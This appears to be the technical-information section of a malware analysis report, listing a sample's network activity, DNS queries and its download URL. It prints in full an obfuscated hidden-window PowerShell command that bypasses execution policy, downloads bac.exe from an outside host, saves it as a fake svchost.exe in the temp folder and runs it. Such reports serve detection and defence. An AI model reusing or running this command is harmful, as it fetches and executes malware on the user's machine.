Техническая информация
- http://plussizemadamma.com/bac.exe как %temp%\\svchost.exe
- '<SYSTEM32>\cmd.exe' /c POwErShELl.ExE -wiNdOWStylE HiddeN -nOPrOFILe -ExecUtIOnPOlICY BYPaSS (New-Object SYStEM.NEt.WeBCLIeNT).DOWNLOADFiLe('http://plussizemadamma.com/bac.exe','%TEMP%\\svchost.exe') & %TEMP%\\svc...
- 'co##############e-chains.prod.autograph.services.mozaws.net':443
- 'pl####zemadamma.com':80
- 'pl####zemadamma.com':443
- http://pl####zemadamma.com/bac.exe
- 'pl####zemadamma.com':443
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- DNS ASK pl####zemadamma.com